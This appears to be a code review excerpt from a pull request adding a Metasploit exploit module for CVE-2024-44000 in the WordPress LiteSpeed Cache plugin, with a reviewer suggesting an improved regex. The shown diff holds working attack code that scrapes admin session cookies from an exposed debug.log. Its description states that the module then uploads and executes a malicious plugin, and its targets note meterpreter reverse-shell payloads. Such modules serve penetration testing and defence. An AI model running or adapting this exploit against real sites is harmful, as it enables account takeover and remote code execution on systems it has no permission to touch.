modules/exploits/multi/http/wp_litespeed_cookie_theft.rb

```diff
@@ -0,0 +1,177 @@
+  class AdminCookieError < StandardError; end
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => 'Wordpress LiteSpeed Cache plugin cookie theft',
+        'Description' => %q{
+          This module exploits an unauthenticated account takeover vulnerability in LiteSpeed Cache, a Wordpress plugin
+          that currently has around 6 million active installations. In LiteSpeed Cache versions prior to 6.5.0.1, when
+          the Debug Logging feature is enabled, the plugin will log admin cookies to the /wp-content/debug.log endpoint
+          which is accessible without authentication. The Debug Logging feature in the plugin is not enabled by default.
+          The admin cookies found in the debug.log can be used to upload and execute a malicious plugin containing a payload.
+        },
+        'Author' => [
+          'Rafie Muhammad', # discovery
+          'jheysel-r7' # module
+        ],
+        'References' => [
+          [ 'URL', 'https://patchstack.com/articles/critical-account-takeover-vulnerability-patched-in-litespeed-cache-plugin/'],
+          [ 'CVE', '2024-44000']
+        ],
+        'License' => MSF_LICENSE,
+        'Privileged' => false,
+        'Platform' => ['unix', 'linux', 'win', 'php'],
+        'Arch' => [ARCH_PHP, ARCH_CMD],
+        'Targets' => [
+          [
+            'PHP In-Memory',
+            {
+              'Platform' => 'php',
+              'Arch' => ARCH_PHP
+              # tested with php/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Unix In-Memory',
+            {
+              'Platform' => ['unix', 'linux'],
+              'Arch' => ARCH_CMD
+              # tested with cmd/linux/http/x64/meterpreter/reverse_tcp
+            }
+          ],
+          [
+            'Windows In-Memory',
+            {
+              'Platform' => 'win',
+              'Arch' => ARCH_CMD
+            }
+          ],
+        ],
+        'DefaultTarget' => 0,
+        'DisclosureDate' => '2024-09-04',
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
+      )
+    )
+  end
+
+  def check
+    @admin_cookie = get_valid_admin_cookie
+    CheckCode::Vulnerable('Found and tested valid admin cookie, we can upload and execute a payload')
+  rescue WordPressNotOnline => e
+    return CheckCode::Unknown("This doesn't appear to be a WordPress site: #{e.class}, #{e}")
+  rescue DebugLogError => e
+    return CheckCode::Safe("#{e.class}, #{e}")
+  rescue AdminCookieError => e
+    return CheckCode::Safe("#{e.class}, #{e}")
+  end
+
+  def extract_cookies(debug_log)
+    admin_cookies = []
+    debug_log.each_line do |log_line|
+      match = log_line.match(/Cookie:.*(wordpress_logged_in_[^=]+=[^;]+).*(wordpress_[^=]+=[^;]+)|(wordpress_[^=]+=[^;]+).*(wordpress_logged_in_[^=]+=[^;]+)/)
```

Comment:
For me this regex was not working. Check out this regex, should be fine for all the cases.
```suggestion
      match = log_line.match(/(wordpress(_logged_in)?_[a-f0-9]{32}=[^;]+)/)
```